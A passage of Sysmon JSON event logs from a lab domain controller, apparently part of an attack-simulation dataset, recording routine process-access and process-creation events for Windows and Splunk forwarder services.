08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6281,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6282,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6283,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6284,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6285,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6286,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21A1-5F25-0000-00107D990900}\r\nTargetProcessId: 2468\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21A1-5F25-0000-00107D990900}","TargetProcessId":"2468","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6287,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.523\r\nSourceProcessGUID: {41C8662E-21A1-5F25-0000-00107D990900}\r\nSourceProcessId: 2468\r\nSourceThreadId: 1480\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.523","SourceProcessGUID":"{41C8662E-21A1-5F25-0000-00107D990900}","SourceProcessId":"2468","SourceThreadId":"1480","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:02:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6288,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.946\r\nProcessGuid: {41C8662E-21A1-5F25-0000-0010639B0900}\r\nProcessId: 4556\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:02:41.946","ProcessGuid":"{41C8662E-21A1-5F25-0000-0010639B0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:02:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:02:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6289,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:02:41.945\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21A1-5F25-0000-0010639B0900}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Program 